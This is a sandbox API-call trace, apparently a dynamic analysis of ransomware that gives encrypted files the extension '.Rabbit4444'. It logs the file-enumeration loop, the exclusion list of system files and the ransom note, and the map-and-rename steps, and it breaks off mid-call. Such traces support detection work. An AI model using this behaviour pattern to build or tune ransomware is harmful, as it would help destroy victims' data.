param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms.Rabbit4444") returned 192 [0059.554] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d679d992-d843-4d3c-bfea-5edf4d37ee9f}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d679d992-d843-4d3c-bfea-5edf4d37ee9f}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.555] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56728541, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56728541, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2216c19d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", cAlternateFileName="CL44B2~1.SET")) returned 1 [0059.555] lstrcmpiW (lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.555] lstrcmpiW (lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.555] lstrcmpiW (lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.555] lstrcmpiW (lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", lpString2=".") returned 1 [0059.555] lstrcmpiW (lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", lpString2="..") returned 1 [0059.555] lstrcmpiW (lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", lpString2="windows") returned -1 [0059.555] lstrcmpiW (lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.555] lstrcmpiW (lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.555] lstrcmpiW (lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", lpString2="boot") returned 1 [0059.555] lstrcmpiW (lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.555] lstrcmpiW (lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.555] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms" | out: lpString1="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms") returned="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms" [0059.555] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.556] lstrlenW (lpString="Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms") returned 64 [0059.556] lstrlenW (lpString="Rabbit4444") returned 10 [0059.556] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.556] lstrlenW (lpString=".dll") returned 4 [0059.556] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.556] lstrlenW (lpString=".lnk") returned 4 [0059.556] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.556] lstrlenW (lpString=".ini") returned 4 [0059.556] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.556] lstrlenW (lpString=".sys") returned 4 [0059.556] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.556] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d825fec7-da3d-456a-bef2-20f07ba0449e}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.556] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.556] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15086695314) returned 1 [0059.556] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1015) returned 1 [0059.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0059.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0059.556] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0059.557] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0059.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.559] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.559] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.559] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.559] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15086948520) returned 1 [0059.559] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0059.559] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0059.559] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.559] CloseHandle (hObject=0x298) returned 1 [0059.559] CloseHandle (hObject=0x278) returned 1 [0059.559] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms.Rabbit4444") returned 192 [0059.559] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d825fec7-da3d-456a-bef2-20f07ba0449e}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d825fec7-da3d-456a-bef2-20f07ba0449e}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.560] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5680d35a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5680d35a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x221b864e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", cAlternateFileName="CL565F~1.SET")) returned 1 [0059.560] lstrcmpiW (lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.560] lstrcmpiW (lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.560] lstrcmpiW (lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.560] lstrcmpiW (lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", lpString2=".") returned 1 [0059.560] lstrcmpiW (lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", lpString2="..") returned 1 [0059.560] lstrcmpiW (lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", lpString2="windows") returned -1 [0059.560] lstrcmpiW (lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.560] lstrcmpiW (lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.560] lstrcmpiW (lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", lpString2="boot") returned 1 [0059.560] lstrcmpiW (lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.560] lstrcmpiW (lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.560] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms" | out: lpString1="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms") returned="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms" [0059.560] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.561] lstrlenW (lpString="Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms") returned 64 [0059.561] lstrlenW (lpString="Rabbit4444") returned 10 [0059.561] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.561] lstrlenW (lpString=".dll") returned 4 [0059.561] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.561] lstrlenW (lpString=".lnk") returned 4 [0059.561] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.561] lstrlenW (lpString=".ini") returned 4 [0059.561] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.561] lstrlenW (lpString=".sys") returned 4 [0059.561] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.561] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.561] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.561] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15087212189) returned 1 [0059.561] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=944) returned 1 [0059.561] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.562] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0059.562] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.562] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.563] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.564] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.564] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.564] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.564] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15087457727) returned 1 [0059.564] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.564] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0059.564] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.564] CloseHandle (hObject=0x298) returned 1 [0059.564] CloseHandle (hObject=0x278) returned 1 [0059.564] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms.Rabbit4444") returned 192 [0059.564] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.565] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x568a5cc6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x568a5cc6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", cAlternateFileName="CLCA5B~1.SET")) returned 1 [0059.565] lstrcmpiW (lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.565] lstrcmpiW (lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.565] lstrcmpiW (lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.565] lstrcmpiW (lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", lpString2=".") returned 1 [0059.565] lstrcmpiW (lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", lpString2="..") returned 1 [0059.565] lstrcmpiW (lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", lpString2="windows") returned -1 [0059.565] lstrcmpiW (lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.565] lstrcmpiW (lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.565] lstrcmpiW (lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", lpString2="boot") returned 1 [0059.565] lstrcmpiW (lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.565] lstrcmpiW (lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.566] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms" | out: lpString1="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms") returned="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms" [0059.566] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.566] lstrlenW (lpString="Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms") returned 64 [0059.566] lstrlenW (lpString="Rabbit4444") returned 10 [0059.566] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.566] lstrlenW (lpString=".dll") returned 4 [0059.566] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.566] lstrlenW (lpString=".lnk") returned 4 [0059.566] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.566] lstrlenW (lpString=".ini") returned 4 [0059.566] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.566] lstrlenW (lpString=".sys") returned 4 [0059.566] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.566] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{dd338333-7000-45cc-a84d-64680d6e683d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.566] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.566] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15087722185) returned 1 [0059.567] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1151) returned 1 [0059.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0059.567] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0059.569] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0059.570] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.570] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.570] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.570] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.570] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.570] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.570] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.570] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.570] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15088126021) returned 1 [0059.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0059.571] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.571] CloseHandle (hObject=0x298) returned 1 [0059.571] CloseHandle (hObject=0x278) returned 1 [0059.571] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms.Rabbit4444") returned 192 [0059.571] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{dd338333-7000-45cc-a84d-64680d6e683d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{dd338333-7000-45cc-a84d-64680d6e683d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.572] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5693e634, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5693e634, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224d97aa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", cAlternateFileName="CL34D0~1.SET")) returned 1 [0059.572] lstrcmpiW (lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.572] lstrcmpiW (lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.572] lstrcmpiW (lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.572] lstrcmpiW (lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", lpString2=".") returned 1 [0059.572] lstrcmpiW (lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", lpString2="..") returned 1 [0059.572] lstrcmpiW (lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", lpString2="windows") returned -1 [0059.572] lstrcmpiW (lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.572] lstrcmpiW (lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.572] lstrcmpiW (lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", lpString2="boot") returned 1 [0059.572] lstrcmpiW (lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.572] lstrcmpiW (lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.572] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms" | out: 